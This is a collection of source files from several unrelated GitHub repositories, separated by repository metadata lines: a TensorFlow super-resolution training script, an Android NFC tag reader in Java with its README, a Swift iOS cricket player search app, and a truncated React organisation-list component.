'w16': tf.get_variable('w16', shape=[3, 3, 64, 64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'w17': tf.get_variable('w17', shape=[3, 3, 64, 1], initializer=tf.contrib.layers.xavier_initializer_conv2d())
}
biases = {
'b1': tf.get_variable('b1', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b2': tf.get_variable('b2', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b3': tf.get_variable('b3', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b4': tf.get_variable('b4', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b5': tf.get_variable('b5', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b6': tf.get_variable('b6', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b7': tf.get_variable('b7', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b8': tf.get_variable('b8', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b9': tf.get_variable('b9', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b10': tf.get_variable('b10', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b11': tf.get_variable('b11', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b12': tf.get_variable('b12', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b13': tf.get_variable('b13', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b14': tf.get_variable('b14', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b15': tf.get_variable('b15', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b16': tf.get_variable('b16', shape=[64], initializer=tf.contrib.layers.xavier_initializer_conv2d()),
'b17': tf.get_variable('b17', shape=[1], initializer=tf.contrib.layers.xavier_initializer_conv2d())
}
with tf.device(device):
conv1 = tf.nn.relu(tf.nn.conv2d(X, weights['w1'], strides=[1, 1, 1, 1], padding='SAME') + biases['b1'])
conv2 = tf.nn.relu(tf.nn.conv2d(conv1, weights['w2'], strides=[1, 1, 1, 1], padding='SAME') + biases['b2'])
conv3 = tf.nn.relu(tf.nn.conv2d(conv2, weights['w3'], strides=[1, 1, 1, 1], padding='SAME') + biases['b3'])
conv4 = tf.nn.relu(tf.nn.conv2d(conv3, weights['w4'], strides=[1, 1, 1, 1], padding='SAME') + biases['b4'])
conv5 = tf.nn.relu(tf.nn.conv2d(conv4, weights['w5'], strides=[1, 1, 1, 1], padding='SAME') + biases['b5'])
conv6 = tf.nn.relu(tf.nn.conv2d(conv5, weights['w6'], strides=[1, 1, 1, 1], padding='SAME') + biases['b6'])
conv7 = tf.nn.relu(tf.nn.conv2d(conv6, weights['w7'], strides=[1, 1, 1, 1], padding='SAME') + biases['b7'])
conv8 = tf.nn.relu(tf.nn.conv2d(conv7, weights['w8'], strides=[1, 1, 1, 1], padding='SAME') + biases['b8'])
conv9 = tf.nn.relu(tf.nn.conv2d(conv8, weights['w9'], strides=[1, 1, 1, 1], padding='SAME') + biases['b9'])
conv10 = tf.nn.relu(tf.nn.conv2d(conv9, weights['w10'], strides=[1, 1, 1, 1], padding='SAME') + biases['b10'])
conv11 = tf.nn.relu(tf.nn.conv2d(conv10, weights['w11'], strides=[1, 1, 1, 1], padding='SAME') + biases['b11'])
conv12 = tf.nn.relu(tf.nn.conv2d(conv11, weights['w12'], strides=[1, 1, 1, 1], padding='SAME') + biases['b12'])
conv13 = tf.nn.relu(tf.nn.conv2d(conv12, weights['w13'], strides=[1, 1, 1, 1], padding='SAME') + biases['b13'])
conv14 = tf.nn.relu(tf.nn.conv2d(conv13, weights['w14'], strides=[1, 1, 1, 1], padding='SAME') + biases['b14'])
conv15 = tf.nn.relu(tf.nn.conv2d(conv14, weights['w15'], strides=[1, 1, 1, 1], padding='SAME') + biases['b15'])
conv16 = tf.nn.relu(tf.nn.conv2d(conv15, weights['w16'], strides=[1, 1, 1, 1], padding='SAME') + biases['b16'])
conv17 = tf.nn.conv2d(conv2, weights['w17'], strides=[1, 1, 1, 1], padding='SAME') + biases['b17']
out = tf.add(X, conv17)
loss = tf.reduce_mean(tf.square(Y - out))
optm = tf.train.AdamOptimizer(learning_rate).minimize(loss)
with tf.device(device):
sess = tf.Session()
sess.run(tf.global_variables_initializer())
train_path='images/train_bicubic_x2/'
label_path='images/train_HR/'
result_path='results/SRCNN_v1/'
with tf.device(device):
for epoch in range(epoch_size):
avr_psnr = 0
for i in range(total_iter):
index = np.random.choice(800, batch_size, replace=False) + 1
train_image = imread(path=train_path, index=index, is_train=True, scale=2)
label_image = imread(path=label_path, index=index)
sess.run(optm, feed_dict={X: train_image, Y: label_image})
tr_loss = sess.run(loss, feed_dict={X: train_image, Y: label_image})
psnr = 20 * np.log10(1. / np.sqrt(tr_loss))
avr_psnr += psnr
print ('epoch: %3d, Avr_PSNR: %4f' % (epoch, avr_psnr / total_iter))
img = sess.run(conv3, feed_dict={X: train_image})
for j in range(img.shape[0]):
imsave(img[j, :, :, 0], result_path + 'srcnn' + str(j).zfill(4) + '.png')
imsave(train_image[j, :, :, 0], result_path + 'interpol_' + str(j).zfill(4) + '.png')
| a5d66c53f882185521271bce397bb721be96294a | [
"Python"
] | 2 | Python | sjsong08/SuperResolution | 82473f62a2e6a791d0189c462bdfea6de8696c81 | 6c7cb1f4090024984cad5e29cfbf803e1fc37bac |
refs/heads/master | <repo_name>SaadBilal/SimpleNFC<file_sep>/README.md
# SimpleNFC
SimpleNFC is a project which include insanely easy way of reading NFC data
### Tech
SimpleNFC uses a number of open source lib to work properly:
* [RXJava] - Reactive Extensions for the JVM
* [RXAndroid] - Reactive Extensions for Android
### Integrate for custom projects
Implement NFCInterface
```sh
public class MainActivity extends Activity implements NFCInterface{
....
```
Create Subscription local variable
```sh
private Subscription nfcSubscription;
```
Fill the implemented methods
```sh
@Override
protected void onResume() {
super.onResume();
PendingIntent pendingIntent = PendingIntent.getActivity(this, 0, new Intent(this,getClass()).addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP), 0);
IntentFilter filter = new IntentFilter();
filter.addAction(NfcAdapter.ACTION_TAG_DISCOVERED);
filter.addAction(NfcAdapter.ACTION_NDEF_DISCOVERED);
filter.addAction(NfcAdapter.ACTION_TECH_DISCOVERED);
NfcAdapter nfcAdapter = NfcAdapter.getDefaultAdapter(this);
nfcAdapter.enableForegroundDispatch(this, pendingIntent, new IntentFilter[]{filter}, this.techList);
}
@Override
protected void onPause() {
super.onPause();
// disabling foreground dispatch:
NfcAdapter nfcAdapter = NfcAdapter.getDefaultAdapter(this);
nfcAdapter.disableForegroundDispatch(this);
}
@Override
protected void onNewIntent(Intent intent) {
if (intent.getAction().equals(NfcAdapter.ACTION_TAG_DISCOVERED)) {
String type = intent.getType();
Tag tag = intent.getParcelableExtra(NfcAdapter.EXTRA_TAG);
nfcReader(tag);
}
}
@Override
public String nfcRead(Tag t) {
try {
Tag tag = t;
Ndef ndef = Ndef.get(tag);
if (ndef == null) {
return null;
}
NdefMessage ndefMessage = ndef.getCachedNdefMessage();
NdefRecord[] records = ndefMessage.getRecords();
for (NdefRecord ndefRecord : records)
{
if (ndefRecord.getTnf() == NdefRecord.TNF_WELL_KNOWN && Arrays.equals(ndefRecord.getType(), NdefRecord.RTD_TEXT))
{
try {return readText(ndefRecord);} catch (UnsupportedEncodingException e) {}
}
}
}
catch (Exception e)
{
return null;
}
return null;
}
@Override
public String readText(NdefRecord record) throws UnsupportedEncodingException {
byte[] payload = record.getPayload();
String textEncoding = ((payload[0] & 128) == 0) ? "UTF-8" : "UTF-16";
int languageCodeLength = payload[0] & 0063;
return new String(payload, languageCodeLength + 1, payload.length - languageCodeLength - 1, textEncoding);
}
@Override
public void nfcReader(Tag tag) {
nfcSubscription= Observable.just(nfcRead(tag))
.subscribeOn(Schedulers.newThread())
.observeOn(AndroidSchedulers.mainThread())
.subscribe(new Observer<String>() {
@Override
public void onCompleted() {
}
@Override
public void onError(Throwable e) {
}
@Override
public void onNext(String s) {
if (s != null) {
txtNFCID.setText(s);
}
}
});
}
```
Define onDestroy and unsubscribe on that
```sh
@Override
protected void onDestroy() {
super.onDestroy();
unsubscribe(nfcSubscription);
}
private static void unsubscribe(Subscription subscription) {
if (subscription != null && !subscription.isUnsubscribed()) {
subscription.unsubscribe();
subscription = null;
}
}
```
<file_sep>/app/src/main/java/com/apex/simplenfc/MainActivity.java
package com.apex.simplenfc;
import android.app.Activity;
import android.app.PendingIntent;
import android.content.Intent;
import android.content.IntentFilter;
import android.nfc.NdefMessage;
import android.nfc.NdefRecord;
import android.nfc.NfcAdapter;
import android.nfc.Tag;
import android.nfc.tech.Ndef;
import android.os.Environment;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.widget.TextView;
import com.apex.simplenfc.NFC.NFCInterface;
import java.io.File;
import java.io.UnsupportedEncodingException;
import java.util.Arrays;
import java.util.List;
import rx.Observable;
import rx.Observer;
import rx.Subscription;
import rx.android.schedulers.AndroidSchedulers;
import rx.schedulers.Schedulers;
public class MainActivity extends Activity implements NFCInterface{
TextView txtNFCID;
private Subscription nfcSubscription;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
txtNFCID=(TextView)findViewById(R.id.txtNFCID);
}
@Override
protected void onResume() {
super.onResume();
PendingIntent pendingIntent = PendingIntent.getActivity(this, 0, new Intent(this, getClass()).addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP), 0);
IntentFilter filter = new IntentFilter();
filter.addAction(NfcAdapter.ACTION_TAG_DISCOVERED);
filter.addAction(NfcAdapter.ACTION_NDEF_DISCOVERED);
filter.addAction(NfcAdapter.ACTION_TECH_DISCOVERED);
NfcAdapter nfcAdapter = NfcAdapter.getDefaultAdapter(this);
nfcAdapter.enableForegroundDispatch(this, pendingIntent, new IntentFilter[]{filter}, this.techList);
}
@Override
protected void onPause() {
super.onPause();
// disabling foreground dispatch:
NfcAdapter nfcAdapter = NfcAdapter.getDefaultAdapter(this);
nfcAdapter.disableForegroundDispatch(this);
}
@Override
protected void onNewIntent(Intent intent) {
if (intent.getAction().equals(NfcAdapter.ACTION_TAG_DISCOVERED)) {
String type = intent.getType();
Tag tag = intent.getParcelableExtra(NfcAdapter.EXTRA_TAG);
nfcReader(tag);
}
}
@Override
public String nfcRead(Tag t) {
try {
Tag tag = t;
Ndef ndef = Ndef.get(tag);
if (ndef == null) {
return null;
}
NdefMessage ndefMessage = ndef.getCachedNdefMessage();
NdefRecord[] records = ndefMessage.getRecords();
for (NdefRecord ndefRecord : records)
{
if (ndefRecord.getTnf() == NdefRecord.TNF_WELL_KNOWN && Arrays.equals(ndefRecord.getType(), NdefRecord.RTD_TEXT))
{
try {return readText(ndefRecord);} catch (UnsupportedEncodingException e) {}
}
}
}
catch (Exception e)
{
return null;
}
return null;
}
@Override
public String readText(NdefRecord record) throws UnsupportedEncodingException {
byte[] payload = record.getPayload();
String textEncoding = ((payload[0] & 128) == 0) ? "UTF-8" : "UTF-16";
int languageCodeLength = payload[0] & 0063;
return new String(payload, languageCodeLength + 1, payload.length - languageCodeLength - 1, textEncoding);
}
@Override
public void nfcReader(Tag tag) {
nfcSubscription= Observable.just(nfcRead(tag))
.subscribeOn(Schedulers.newThread())
.observeOn(AndroidSchedulers.mainThread())
.subscribe(new Observer<String>() {
@Override
public void onCompleted() {
}
@Override
public void onError(Throwable e) {
}
@Override
public void onNext(String s) {
if (s != null) {
txtNFCID.setText(s);
}
}
});
}
@Override
protected void onDestroy() {
super.onDestroy();
unsubscribe(nfcSubscription);
}
private static void unsubscribe(Subscription subscription) {
if (subscription != null && !subscription.isUnsubscribed()) {
subscription.unsubscribe();
subscription = null;
}
}
}
| 5f813631a050ab8a79e68ca9de2d37b1112e0a60 | [
"Markdown",
"Java"
] | 2 | Markdown | SaadBilal/SimpleNFC | 5f94c1648e54285608abaa1ccaa7220dcd115aed | b323e29470ed6e377eecb86b2c72b7de5f3571a5 |
refs/heads/master | <repo_name>have-not-BUG/prerender-demo<file_sep>/src/main.js
import Vue from 'vue'
import App from './App.vue'
import axios from 'axios';
import router from './router'
Vue.config.productionTip = false
Vue.prototype.$axios = axios;
new Vue({
render: h => h(App),
router,
// 延迟5s 保证页面请求和内容全部能够加载渲染完成
mounted () {
setTimeout(() => {
console.log("dispatch event");
window.document.dispatchEvent(new Event("render-event"));
}, 5000);
}
}).$mount("#app");
// document.addEventListener("DOMContentLoaded", () => {
// app.$mount("#app");
// });
| 368a187ff47d3ceb61954ed0adc834ab8b06b116 | [
"JavaScript"
] | 1 | JavaScript | have-not-BUG/prerender-demo | 23aeaa73b57c2850154e9a379b6eacbeb9db81ae | 864394447165f37159c11f4d7e29255a4139c427 |
refs/heads/master | <file_sep>//
// ViewController.swift
// PlayerFinder
//
// Created by Sarika on 26/06/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import UIKit
class SearchViewController: UIViewController, UITableViewDataSource, UITableViewDelegate, UISearchBarDelegate, UITextFieldDelegate
{
// Outlet variables
@IBOutlet weak var tableView: UITableView!
@IBOutlet weak var searchBar: UISearchBar!
@IBOutlet weak var guidanceLabel: UILabel!
// Private Variables
fileprivate var searchViewModel = SearchViewModel()
override func viewDidLoad()
{
super.viewDidLoad()
initUI()
}
func initUI()
{
tableView.tableFooterView = UIView()
self.title = "Search"
}
// MARK:- TableView Datasource
func numberOfSections(in tableView: UITableView) -> Int
{
return 1
}
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int
{
return searchViewModel.data.count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell
{
let searchPlayerCell = tableView.dequeueReusableCell(withIdentifier: "CID_SEARCH_PLAYER", for: indexPath)
let curPlayer = searchViewModel.data[indexPath.row]
searchPlayerCell.textLabel?.text = curPlayer.fullName
return searchPlayerCell
}
// MARK: - TableView Delegate
func tableView(_ tableView: UITableView, didSelectRowAt indexPath: IndexPath)
{
let playerDetailVC = storyboard?.instantiateViewController(withIdentifier: "VID_PLAYER_DETAIL") as? PlayerDetailViewController
playerDetailVC?.playerDetailViewModel.pidStr = "\(searchViewModel.data[indexPath.row].pid)"
self.navigationController?.pushViewController(playerDetailVC!, animated: true)
}
//MARK: - UISearchBarDelegate delegate
func searchBarCancelButtonClicked(_ searchBar: UISearchBar)
{
searchBar.resignFirstResponder()
}
func searchBar(_ searchBar: UISearchBar, textDidChange searchText: String)
{
self.guidanceLabel.isHidden = true
if AppUtility.sharedInstance.isNetworkConnected()
{
startActivityIndicator()
searchViewModel.searchPlayer(searchText) { (success, error) in
guard error == nil else {
return
}
self.stopActivityIndicator()
self.setUI()
}
}
else
{
self.showAlert("Error", msg: "No internet connection")
}
}
func searchBarSearchButtonClicked(_ searchBar: UISearchBar)
{
searchBar.resignFirstResponder()
}
func setUI()
{
if self.searchViewModel.data.count == 0
{
self.guidanceLabel.isHidden = false
self.guidanceLabel.text = "Oops, no player found with this name."
}
else
{
self.guidanceLabel.isHidden = true
}
self.tableView.reloadData()
}
}
<file_sep>//
// PlayerDetailViewModel.swift
// PlayerFinder
//
// Created by Sarika on 02/07/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
class PlayerDetailViewModel
{
var data : [PlayerDetail] = []
var removeKeyList = ["provider","ttl","creditsLeft","pid", "data", "v", "imageURL", "fullName"]
var profileImageUrlStr = ""
var pidStr = ""
func downloadImage(completion: @escaping ((Data?, Error?) ->Void))
{
NetworkService.getImageData(from: URL(string: profileImageUrlStr)!) { data, response, error in
guard let data = data, error == nil
else
{
return
}
DispatchQueue.main.async() {
completion(data, nil)
}
}
}
func getData(completion: @escaping ((Bool, Error?) ->Void))
{
NetworkService.getData(PLAYER_STATS_WS_URL, parameters: ["pid":pidStr], completion: { (data, error) in
guard error == nil, let data = data else {
return
}
do {
if let json = try JSONSerialization.jsonObject(with: data, options: .mutableContainers) as? [String: Any]
{
self.profileImageUrlStr = AppUtility.isValid(json["imageURL"] as? String) ? json["imageURL"] as! String : ""
var skillDetail = [SkillDetail]()
for bioKey in Array(json.keys)
{
if !(self.checkKeyPresent(bioKey))
{
let skillValue = AppUtility.isValid(json[bioKey] as? String) ? (json[bioKey] as! String) : ""
if bioKey == "name"
{
skillDetail.insert((SkillDetail(skillKey : bioKey, skillValue : skillValue)), at: 0)
}
else
{
skillDetail.append(SkillDetail(skillKey : bioKey, skillValue : skillValue))
}
}
}
self.data.append(PlayerDetail(title : "Bio", highlight : true, isOpen : true, sectionType: .Bio , skillDetail : skillDetail))
if let skillData = json["data"] as? [String : Any]
{
for skillKey in skillData.keys
{
skillDetail = []
let sectionType : TableSection = skillKey == "batting" ? .Batting : .Bowling
self.data.append(PlayerDetail(title : skillKey, highlight : true, isOpen : false, sectionType: sectionType , skillDetail : skillDetail))
skillDetail = []
if let gameType = skillData[skillKey] as? [String : Any]
{
if gameType.keys.count == 0
{
self.data.removeLast()
}
for gameKey in gameType.keys
{
if let gameDetails = gameType[gameKey] as? [String : Any]
{
for key in Array(gameDetails.keys)
{
skillDetail.append(SkillDetail(skillKey : key, skillValue : gameDetails[key] as! String))
}
self.data.append(PlayerDetail(title : gameKey, highlight : false , isOpen : false, sectionType: sectionType, skillDetail : skillDetail))
}
}
}
}
}
DispatchQueue.main.async
{
completion(true, nil)
}
}
else
{
throw (ErrorStatement.FoundNil("PlayerData"))
}
}
catch
{
print("Error: \(error)")
}
})
}
func checkKeyPresent( _ toSearchKey : String) -> Bool
{
var isPresent = false
for key in removeKeyList
{
if key == toSearchKey
{
isPresent = true
break
}
}
return isPresent
}
}
<file_sep>//
// PlayerDetailViewController.swift
// PlayerFinder
//
// Created by Sarika on 26/06/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import UIKit
class PlayerDetailViewController: UIViewController, UITableViewDataSource, UITableViewDelegate, UIGestureRecognizerDelegate
{
// Outlet Variables
@IBOutlet weak var tableView: UITableView!
@IBOutlet weak var userProfile: UIImageView!
var playerDetailViewModel = PlayerDetailViewModel()
override func viewDidLoad()
{
super.viewDidLoad()
initUI()
}
func initUI()
{
tableView.tableFooterView = UIView()
self.title = "Player Detail"
startActivityIndicator()
if AppUtility.sharedInstance.isNetworkConnected()
{
playerDetailViewModel.getData { (success, error) in
if success
{
self.stopActivityIndicator()
self.setUI()
}
}
}
else
{
self.showAlert("Error", msg: "No internet connection")
}
}
// MARK: - TableView Datasource
func numberOfSections(in tableView: UITableView) -> Int
{
return playerDetailViewModel.data.count
}
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int
{
let sectionData = playerDetailViewModel.data[section]
let rowCount = sectionData.isOpen == true ? sectionData.skillDetail.count : 0
return rowCount
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell
{
let playerDetailCell = tableView.dequeueReusableCell(withIdentifier: "CID_SEARCH_PLAYER", for: indexPath)
let curSkill = playerDetailViewModel.data[indexPath.section].skillDetail[indexPath.row]
playerDetailCell.textLabel?.numberOfLines = indexPath.section == TableSection.Bio.rawValue ? 0 : 1
playerDetailCell.textLabel?.text = ("\(curSkill.skillKey) : \(curSkill.skillValue)").firstUppercased
return playerDetailCell
}
// MARK: - TableView Delegate
func tableView(_ tableView: UITableView, viewForHeaderInSection section: Int) -> UIView?
{
let curSection = playerDetailViewModel.data[section]
let headerHeight = curSection.highlight ? 50 : 40
var headerView : UIView?
headerView = UIView(frame: CGRect(x: 0, y: 0, width: Int(tableView.frame.size.width), height: headerHeight))
headerView?.backgroundColor = curSection.highlight ? UIColor.black : UIColor.lightGray
headerView?.tag = section
let tapRecognizer = UITapGestureRecognizer(target: self, action: #selector(handleTap))
tapRecognizer.delegate = self
tapRecognizer.numberOfTapsRequired = 1
headerView?.addGestureRecognizer(tapRecognizer)
let expandImage = UIImageView(frame: CGRect(x: Int(tableView.frame.size.width - 40), y: Int(headerView!.frame.size.height/2 - 10), width: 20, height: 20))
expandImage.tag = 101
expandImage.image = UIImage(named: curSection.isOpen ? "minus" : "plus")
expandImage.isHidden = curSection.highlight ? true : false
headerView?.addSubview(expandImage)
let headerLabel = UILabel(frame: CGRect(x: 20, y: 0, width: Int(tableView.frame.size.width - 40), height: headerHeight))
headerLabel.text = curSection.title.firstUppercased
headerLabel.textColor = curSection.highlight ? UIColor.white : UIColor.black
headerView?.addSubview(headerLabel)
return headerView!
}
@objc func handleTap(gestureRecognizer: UIGestureRecognizer)
{
if let index = gestureRecognizer.view?.tag, index != TableSection.Bio.rawValue
{
if playerDetailViewModel.data[index].isOpen == true
{
playerDetailViewModel.data[index].isOpen = false
}
else
{
playerDetailViewModel.data[index].isOpen = true
}
tableView.reloadData()
}
}
func tableView(_ tableView: UITableView, heightForHeaderInSection section: Int) -> CGFloat
{
return playerDetailViewModel.data[section].highlight == true ? 50.0 : 40.0
}
func tableView(_ tableView: UITableView, heightForRowAt indexPath: IndexPath) -> CGFloat
{
let curSkill = playerDetailViewModel.data[indexPath.section].skillDetail[indexPath.row]
var rowHeight = 40.0
if indexPath.section == TableSection.Bio.rawValue
{
if AppUtility.isValid(curSkill.skillValue)
{
let str = "\(curSkill.skillKey) : \(curSkill.skillValue)"
rowHeight = Double(str.height(withConstrainedWidth: self.view.frame.width/2, font: UIFont.systemFont(ofSize: 12.5))) + 20
rowHeight = rowHeight < 40 ? 40 : rowHeight
}
}
return CGFloat(rowHeight)
}
// MARK: - Other Function
func setUI()
{
tableView.reloadData()
if AppUtility.isValid(playerDetailViewModel.profileImageUrlStr)
{
playerDetailViewModel.downloadImage { (data, error) in
guard error == nil, let data = data else {
return
}
self.userProfile.image = UIImage(data: data)
}
}
}
}
<file_sep>//
// SearchPlayerResponse.swift
// PlayerFinder
//
// Created by <NAME> on 01/07/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
struct SearchPlayerResponse : Codable
{
var data : [SearchPlayerData]
}
struct SearchPlayerData : Codable
{
var pid : Int
var fullName : String
var name : String
}
<file_sep>//
// NetworkService.swift
// PlayerFinder
//
// Created by Sarika on 27/06/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
class NetworkService
{
/**
* Use to communicate with server and notifies with server response
- parameter wsURL: alias to form Web API.
- parameters: request parameters to be send with request
- withDelegate parameters: delegate to send server response.
*/
class func getData(_ wsURL: String, parameters : Dictionary <String,Any>?, completion: @escaping ((Data?, Error?) ->Void))
{
if AppUtility.isValid(wsURL)
{
var requestUrl : String = ""
if wsURL.contains(BASE_WS_URL)
{
requestUrl = wsURL
}
else
{
requestUrl = BASE_WS_URL + wsURL
}
var requestDict = parameters
var urlComponents = URLComponents(string: requestUrl)!
let keyQueryItem = URLQueryItem(name: "apikey", value: API_KEY)
var arrQueryItems = [URLQueryItem]()
arrQueryItems.append(keyQueryItem)
urlComponents.queryItems?.append(keyQueryItem)
if let keyArr = requestDict?.keys
{
for key in Array(keyArr)
{
arrQueryItems.append(URLQueryItem(name: key, value: (requestDict![key] as! String)))
}
}
urlComponents.queryItems = arrQueryItems
if let url = urlComponents.url
{
var request = URLRequest(url: url )
request.httpMethod = "GET"
URLSession.shared.dataTask(with: request, completionHandler: { receivedData, response, error -> Void in
if let receivedData = receivedData
{
let response = NSString (data: receivedData, encoding: String.Encoding.utf8.rawValue)
print("response is \(String(describing: response))")
completion(receivedData, nil)
}
else
{
completion(nil, (error!.localizedDescription as! Error))
}
}).resume()
}
}
}
class func getImageData(from url: URL, completion: @escaping (Data?, URLResponse?, Error?) -> ())
{
URLSession.shared.dataTask(with: url, completionHandler: completion).resume()
}
class func getSearchData (_ wsURL: String, parameters : Dictionary <String,String>?, completion: @escaping ((SearchPlayerResponse?, Error?) ->Void))
{
let url = URL(string: wsURL)!
let request = URLRequest(url: url)
let task = URLSession.shared.dataTask(with: request) { data, response, error in
guard let data = data, error == nil else {
return
}
do {
let decoder = JSONDecoder()
if let playerData = try? decoder.decode(SearchPlayerResponse.self, from: data)
{
completion(playerData,nil)
}
else
{
throw (ErrorStatement.FoundNil("Player Data"))
}
}
catch
{
completion(nil, (error.localizedDescription as! Error))
}
}
task.resume()
}
}
<file_sep>//
// SearchViewModel.swift
// PlayerFinder
//
// Created by Sarika on 02/07/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
class SearchViewModel
{
var data : [SearchPlayerData] = []
func searchPlayer(_ userNameToSearch:String, completion: @escaping ((Bool, Error?) ->Void))
{
NetworkService.getData(PlAYER_FINDER_WS_URL, parameters: ["name": userNameToSearch], completion: { (responseData, error) in
guard error == nil, let responseData = responseData else {
//handle the error here
return
}
do {
let decoder = JSONDecoder()
if let playerData = try? decoder.decode(SearchPlayerResponse.self, from: responseData)
{
DispatchQueue.main.async
{
self.data.removeAll()
self.data = playerData.data
completion(true, nil)
}
}
else
{
throw (ErrorStatement.FoundNil("PlayerData"))
}
}
catch
{
print("Error: \(error)")
}
})
}
}
<file_sep>//
// AppUtility.swift
// PlayerFinder
//
// Created by Sarika on 27/06/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
import UIKit
class AppUtility
{
static let sharedInstance = AppUtility()
private init()
{
}
/**
Use to check string is valid or not
- Returns : Bool result string validation
*/
class func isValid(_ string: String?) -> Bool
{
var result : Bool = true
if string == nil || string!.trimmingCharacters(in: CharacterSet.whitespacesAndNewlines) == "" || string == "<null>"
{
result = false
}
return result
}
/**
Use to check internet connectivity
- Returns : Bool result connectivity status
*/
func isNetworkConnected() -> Bool
{
var result = false
let reach = Reachability.forInternetConnection()
if reach!.isReachableViaWiFi() || reach!.isReachableViaWWAN()
{
result = true
}
return result
}
}
extension UIViewController
{
/**
UIViewController extenstion
Use to show UIAlertController with title and message on UIViewController
*/
func showAlert( _ screenTitle: String?,msg:String?)
{
if AppUtility.isValid(msg)
{
let alertVC = UIAlertController(title: AppUtility.isValid(screenTitle) ? screenTitle : nil , message: msg!, preferredStyle: .alert)
let okAction = UIAlertAction(title: OK, style: .default , handler: nil)
alertVC.addAction(okAction)
self.present(alertVC, animated: true, completion: nil)
}
}
// Check Internet connection
func checkNetwork() -> Bool
{
let reach = Reachability.forInternetConnection()
if reach!.isReachableViaWiFi() || reach!.isReachableViaWWAN() {
return true
} else {
return false
}
}
// Show Loader spinner
func startActivityIndicator()
{
let loc = self.view.center
let activityIndicator = UIActivityIndicatorView(style: .gray)
activityIndicator.tag = ACTIVITY_INDICATOR_TAG
activityIndicator.center = loc
activityIndicator.hidesWhenStopped = true
activityIndicator.startAnimating()
self.view.addSubview(activityIndicator)
}
func stopActivityIndicator()
{
if let activityIndicator = self.view.subviews.filter(
{ $0.tag == ACTIVITY_INDICATOR_TAG}).first as? UIActivityIndicatorView {
activityIndicator.stopAnimating()
activityIndicator.removeFromSuperview()
}
}
}
extension StringProtocol
{
var firstUppercased: String
{
return prefix(1).uppercased() + dropFirst()
}
}
extension String {
func height(withConstrainedWidth width: CGFloat, font: UIFont) -> CGFloat {
let constraintRect = CGSize(width: width, height: .greatestFiniteMagnitude)
let boundingBox = self.boundingRect(with: constraintRect, options: .usesLineFragmentOrigin, attributes: [NSAttributedString.Key.font: font], context: nil)
return ceil(boundingBox.height)
}
}
<file_sep>//
// AppConstant.swift
// PlayerFinder
//
// Created by Sarika on 27/06/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
let SERVER_ADDRESS = "https://cricapi.com/"
let BASE_WS_URL = SERVER_ADDRESS + "api/"
//MARK: - Player Services
let PlAYER_FINDER_WS_URL = BASE_WS_URL + "playerFinder"
let PLAYER_STATS_WS_URL = BASE_WS_URL + "playerStats"
//MARK: - API Key
let API_KEY = "<KEY>"
let STATUS = "status"
let MSG = "msg"
let RESULT = "result"
let ERROR = NSLocalizedString("Error", comment: "")
let OK = NSLocalizedString("OK", comment: "")
let DELETE = NSLocalizedString("Delete", comment: "")
let CANCEL = NSLocalizedString("Cancel", comment: "")
let DATA = "data"
let ACTIVITY_INDICATOR_TAG = 001
enum ErrorStatement: Error {
case FoundNil(String)
}
<file_sep>//
// PlayerDetailResponse.swift
// PlayerFinder
//
// Created by Sarika on 27/06/19.
// Copyright © 2019 Airadmin. All rights reserved.
//
import Foundation
struct PlayerDetail
{
var title : String
var highlight : Bool
var isOpen : Bool
var sectionType : TableSection
var skillDetail : [SkillDetail]
}
struct SkillDetail
{
var skillKey : String
var skillValue : String
}
enum TableSection : Int{
case Bio = 0
case Batting
case Bowling
}
| 84420d9bc58f5f8f16a9d6e9405e8ea0fc34d417 | [
"Swift"
] | 9 | Swift | SarikaThakurLnt/PlayerFinder | 80e67619c6da72fac5013b0a9e8baeecfd28c5dd | 69ee8096999d24ac485a2ced91c11f75f32772d0 |
refs/heads/master | <file_sep>import React, { useState } from "react";
import styles from "./Organisation.module.css";
import {
Dropdown,
DropdownToggle,
DropdownMenu,
DropdownItem,
} from "reactstrap";
import { makeStyles } from "@material-ui/core/styles";
import Button from "@material-ui/core/Button";
import TextField from "@material-ui/core/TextField";
import SearchIcon from "@material-ui/icons/Search";
import Pagination from '@material-ui/lab/Pagination';
import Table from "../../../../components/OrganisationTable/OrganizationTable";
const useStyles = makeStyles((theme) => ({
root: {
"& > *": {
margin: theme.spacing(1),
},
"& .MuiTextField-root": {
margin: theme.spacing(1),
width: "25ch",
},
},
}));
export default function OrganisationSamadhanID() {
const classes = useStyles();
const [dropdownOpen, setDropdownOpen] = useState(false);
const toggle = () => setDropdownOpen((prevState) => !prevState);
return (
<div className={styles.main}>
<div className={styles.title}>
<span>Organisation List</span>
</div>
<div className={styles.tableDiv}>
